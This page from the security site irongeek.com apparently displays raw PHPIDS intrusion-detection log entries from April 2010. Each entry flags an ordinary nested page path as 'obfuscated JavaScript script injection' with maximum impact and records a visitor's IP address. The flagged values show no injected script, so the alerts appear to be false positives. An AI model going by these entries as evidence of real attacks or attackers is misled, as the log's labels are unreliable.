Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121401
Name:REQUEST.page
Value:security/hackingillustrated/i.php?page=security/security/browserinfo.php
Page:http://www.irongeek.com/i.php?page=security/hackingillustrated/i.php?page=security/security/browserinfo.php
IP:68.82.60.248
Impact:10
Created:2010-04-19 21:44:24
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121402
Name:GET.page
Value:security/hackingillustrated/i.php?page=security/security/browserinfo.php
Page:http://www.irongeek.com/i.php?page=security/hackingillustrated/i.php?page=security/security/browserinfo.php
IP:68.82.60.248
Impact:10
Created:2010-04-19 21:44:24
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121403
Name:REQUEST.page
Value:security/hackingillustrated/i.php?page=security/security/security-podcasts.php
Page:http://www.irongeek.com/i.php?page=security/hackingillustrated/i.php?page=security/security/security-podcasts.php
IP:68.82.60.248
Impact:10
Created:2010-04-19 21:44:24
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121404
Name:GET.page
Value:security/hackingillustrated/i.php?page=security/security/security-podcasts.php
Page:http://www.irongeek.com/i.php?page=security/hackingillustrated/i.php?page=security/security/security-podcasts.php
IP:68.82.60.248
Impact:10
Created:2010-04-19 21:44:24
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

Printable version of this article

blog comments powered by Disqus

Ten most recent posts on Irongeek.com:


If you would like to republish one of the articles from this site on your webpage or print journal please contact IronGeek.

Copyright 2010, IronGeek
Louisville / Kentuckiana Information Security Enthusiast

xxx